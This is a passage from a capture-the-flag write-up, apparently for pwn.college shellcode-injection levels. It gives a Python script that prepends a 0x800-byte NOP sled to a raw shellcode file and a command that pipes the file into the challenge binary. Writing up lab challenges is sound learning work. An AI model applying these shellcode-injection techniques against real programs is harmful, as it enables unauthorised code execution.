srand(time(0)); if (rand() %2) hello(bye1,name); else hello(name , bye2); } //this program will execute what we input as it mistook the order of char* and func :P
back to level1, the given program will execute the shellcode we inject, and let’s see what will happen:
1 2 3 4 5
//terminal cat: flag: Permission denied sudo cat flag sudo: effective uid is not 0, is sudo installed setuid root?
Although we get the shell, we didn’t get root privilege.
As it says, this challenge will randomly skip up to 0x800 bytes in our shellcode.
So, we will make use of the NOP instruction to pass this challenge.
The NOP instruction will lead to No Operation in executing.
This is my solution:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
# define the "\x90" nop_padding = b'\x90' * 0x800
# path of the shellcode-raw input_file_path = 'shellcode-raw'# 替换为你的文件路径
# get text withopen(input_file_path, 'rb') as input_file: original_content = input_file.read()
# inject 0x800 of "\x90" new_content = nop_padding + original_content
withopen(input_file_path, 'wb') as output_file: output_file.write(new_content)
This python file helped us inject some NOP instructions at the beginning of shellcode-raw, then we execute the following command:
1
(cat shellcode-raw ; cat) | ./babyshell_level2
The nop scrolls across the screen quickly from top to bottom, we successfully make it slide over the useless bytes and make the program execute our actual shellcodes.